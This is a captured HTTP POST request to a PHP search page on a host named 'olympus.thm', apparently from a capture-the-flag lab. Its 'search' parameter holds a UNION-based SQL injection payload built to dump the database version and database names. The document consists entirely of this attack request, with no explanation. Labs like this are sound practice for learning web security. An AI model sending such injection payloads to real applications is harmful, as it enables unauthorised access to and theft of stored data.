POST /~webmaster/search.php HTTP/1.1
Host: olympus.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://olympus.thm
Connection: close
Referer: http://olympus.thm/~webmaster/
Cookie: PHPSESSID=teeh4md210abuq0vm81bqd4m4u
Upgrade-Insecure-Requests: 1

search=1337'union+select+1,2,version(),databases(),5,6,7,8,9,10%20--%20-&submit=
